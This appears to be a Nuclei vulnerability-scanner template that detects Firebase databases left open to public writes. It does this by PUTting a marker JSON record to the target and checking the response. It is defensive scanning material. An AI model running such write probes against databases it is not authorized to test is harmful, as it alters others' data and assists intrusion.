id: insecure-firebase-database
info:
name: Firebase Database Permissions Exploit Check
author: rafaelwdornelas
severity: high
description: If the owner of the app have set the security rules as true for both "read" & "write" an attacker can probably dump database and write his own data to firebase database.
reference:
- https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty
tags: firebase
requests:
- raw:
- |
PUT /nuclei.json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"email":"{{randstr}}@example.com","password":"{{randstr_1}}","username":"{{randstr_2}}","nuclei":"insecure-firebase-database"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "insecure-firebase-database"
- type: status
status:
- 200
Nuclei Template:
Examples of vulnerable urls: